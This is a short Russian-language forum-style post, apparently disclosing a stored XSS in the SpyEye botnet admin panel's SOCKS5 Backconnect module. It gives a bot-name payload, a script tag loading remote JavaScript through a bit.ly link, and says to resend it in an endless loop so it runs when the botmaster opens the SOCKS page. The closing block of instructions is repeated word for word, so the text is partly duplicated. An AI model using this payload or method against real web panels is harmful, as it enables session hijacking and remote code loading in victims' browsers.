активная XSS в SpyEye, модуль SOCKS5 Backconnect. PoC не будет, кому очень надо - сделают эксп сами, ничего сложного в этом нет 
итак, суть:
итак, суть:
подключаемся к BC-серверу SOCKS5, в качестве имя бота отправляется JS-код вида A1<script src="http://bit.ly/aBcdEF"></script>
(есть ограничение на размер - поэтому используем сервис коротких ссылок).
какой командой реализовать отправку - узнать несложно.
JS код выполнится после того, как ботмастер зайдет в раздел SOCKS в админке.
отправлку реализуем в бесконечном цикле, чтобы постоянно быть на первой странице.
enjoy!
(есть ограничение на размер - поэтому используем сервис коротких ссылок).
какой командой реализовать отправку - узнать несложно.
JS код выполнится после того, как ботмастер зайдет в раздел SOCKS в админке.
отправлку реализуем в бесконечном цикле, чтобы постоянно быть на первой странице.
enjoy!